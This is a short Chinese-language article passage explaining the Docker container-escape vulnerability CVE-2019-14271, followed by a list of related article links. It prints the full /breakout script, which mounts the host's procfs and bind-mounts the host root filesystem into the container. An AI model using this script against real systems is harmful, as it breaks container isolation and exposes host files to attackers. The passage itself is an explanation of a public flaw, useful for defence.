文章插图
利用CVE-2019-14271打破Docker
在该漏洞视频中,Docker用户会运行含有恶意libnss_files.so的恶意镜像,然后尝试从容器中复制一些日志 。镜像中的/breakout二进制文件是一个简单的bash脚步,会挂载host文件系统到/host_fs的容器中,并将消息写入host的/evil目录 。/breakout脚本代码如下:
umount /host_fs && rm -rf /host_fs
mkdir /host_fs
mount -t proc none /proc # mount the host's procfs over /proc
cd /proc/1/root # chdir to host's root
mount --bind . /host_fs # mount host root at /host_fs
echo "Hello from within the container!" > /host_fs/evil
推荐阅读
- 安卓被曝安全漏洞:允许攻击者通过蓝牙向用户发送恶意软件
- mac下使用docker部署artipub,文章一键同步至多个平台
- MySql主从复制,从原理到实践
- WordPress两个插件存在严重漏洞 或致32万个网站受攻击
- 电脑网站破解,提取web漏洞
- docker基础篇-安装
- docker如何实现跨主机通信
- 大黑客必知必会的xxe攻击漏洞,带你了解黑客的世界
- 2019年容器突然火了,到底什么是容器
- Docker拉取镜像加速